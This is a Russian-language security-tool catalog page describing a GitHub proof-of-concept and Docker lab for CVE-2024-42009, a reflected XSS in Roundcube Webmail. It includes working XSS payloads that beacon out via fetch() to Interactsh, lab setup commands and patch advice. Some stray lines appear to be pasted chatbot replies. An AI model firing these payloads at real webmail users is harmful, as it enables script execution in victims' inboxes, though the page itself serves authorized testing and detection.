Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42009 — Шаблоны Nuclei и Docker-лаборатория для демонстрации и проверки CVE-2024-42009, отраженного XSS в Roundcube Webmail, с использованием Out-of-Band обнаружения через Interactsh для авторизованного тестирования. | Kitploit
Инструменты/GitHubGitHub/shubhankargupta691/cve-2024-42009
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Шаблоны Nuclei и Docker-лаборатория для демонстрации и проверки CVE-2024-42009, отраженного XSS в Roundcube Webmail, с использованием Out-of-Band обнаружения через Interactsh для авторизованного тестирования.

Репозиторий
211 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-42009 – Отраженный XSS в Roundcube Webmail

📌 Обзор

Этот репозиторий содержит Nuclei-шаблон и вспомогательные ресурсы для безопасной демонстрации и проверки CVE-2024-42009, критической уязвимости отраженного XSS в Roundcube Webmail. Ошибка находится в функции message_body() в show.php, где модификации после санитизации приводят к десанитизации и небезопасному рендерингу сконструированного HTML-содержимого письма.

⚠️ Этот PoC предназначен только для образовательного и авторизованного тестирования. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


🧠 Сводка уязвимости

  • CVE ID: CVE-2024-42009
  • Severity: Критический (CVSS 9.8)
  • Affected Versions: Roundcube ≤ 1.6.7 и ≤ 1.5.7
  • Patched Versions: 1.6.8 и 1.5.8
  • Component: message_body() в show.php
  • Impact: Произвольное выполнение JavaScript при просмотре пользователем вредоносного письма

  • 🧪 Стратегия обнаружения (Только для лабораторного использования)

    Этот репозиторий использует внеполосное (OOB) обнаружение через Interactsh для подтверждения выполнения JavaScript в контролируемой лаборатории.

    Ключевые шаги:

    1. Разверните уязвимый экземпляр Roundcube (например, через Docker)
    2. Отправьте специально сформированное письмо с тегом <body>, содержащим onanimationstart и маяк на Interactsh
    3. Откройте письмо в интерфейсе Roundcube
    4. Подтвердите обратный вызов DNS/HTTP на домен Interactsh

    🐳 Настройка лаборатории

    Используйте предоставленный файл Docker Compose, чтобы развернуть локальный экземпляр Roundcube с MailHog (SMTP-приемник) и MariaDB.

    root@kitploit:~
    git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
    cd CVE-2024-42009
    docker compose up -d
    
    • Интерфейс Roundcube: http://localhost:8080
    • Интерфейс MailHog: http://localhost:8025
    • Метод входа: Учетная запись Google

    ⚠️ Не используйте свою учетную запись Google.


    📁 Содержимое репозитория

    • CVE-2024-42009-OOB.yaml – Nuclei-шаблон с Interactsh и внеполосным (OOB) обнаружением
    • CVE-2024-42009.yaml – Nuclei-шаблон без Interactsh и OOB
    • docker-compose.yml – Настройка лабораторной среды для Roundcube Webmail
    • Images/ – Скриншоты, показывающие HTTP/DNS-запросы от Interactsh

    🎥 Видеодемонстрация

    Это видео проходит через всю цепочку эксплойта:

    • Создание полезной нагрузки
    • Отправка по электронной почте или через конечную точку
    • Запуск уязвимости
    • Подтверждение маяка через Interactsh

    (видеодемонстрация)


    Чтобы ответственно включить эти XSS-нагрузки в ваш README, поместите их в раздел, четко обозначенный для образовательных или тестовых целей. Вот предлагаемая структура:


    🧪 Примеры XSS-нагрузок (Только для целей тестирования)

    ⚠️ Отказ от ответственности: Эти нагрузки предназначены только для образовательного использования и авторизованного тестирования безопасности. Не развертывайте их на системах без явного разрешения.

    root@kitploit:~
    <!-- Image tag with onerror -->
    <img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
    
    <!-- Broken image source with onerror -->
    <img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
    
    <!-- SVG with onload -->
    <svg onload="fetch('https://interact.sh/hit')"></svg>
    
    <!-- Script tag -->
    <script>fetch('https://interact.sh/hit')</script>
    
    <!-- JavaScript in iframe src -->
    
    

    🧭 Как использовать

    • Замените https://interact.sh/hit на свою собственную конечную точку прослушивателя.
    • Используйте их в контролируемых средах, таких как локальные лаборатории или платформы CTF.
    • Отслеживайте свою конечную точку на предмет входящих запросов для проверки выполнения.

    🛡️ Смягчение

    Обновите Roundcube до:

    • 1.6.8 или 1.5.8
      Эти версии удаляют уязвимую логику постобработки и применяют более строгую санитизацию и заголовки CSP.

    📜 Ссылки

    Идеально — вот чистый и профессиональный раздел Ссылки, который вы можете включить в свой README или отправку по электронной почте для CVE-2024-42009. Он цитирует все перечисленные вами источники, отформатированные для ясности и доверия:


    📚 Ссылки

    • NVD CVE Entry – CVE-2024-42009 – Официальное описание уязвимости с оценкой CVSS и затронутыми версиями
    • SonarSource Blog – Government Emails at Risk – Углубленный технический анализ и разбор эксплойта
    • GitHub PoC by DaniTheHack3r – Эксплойт на Python с прослушивателем писем и нагрузкой, активируемой анимацией
    • GitHub PoC by Bhanunamikaze – Автоматизированная инъекция нагрузки и эксфильтрация через HTTP-прослушиватель
    • GitHub PoC by 0xbassiouny1337 – Эксплойт хранимого XSS с захватом и декодированием писем в реальном времени

    Скачать инструмент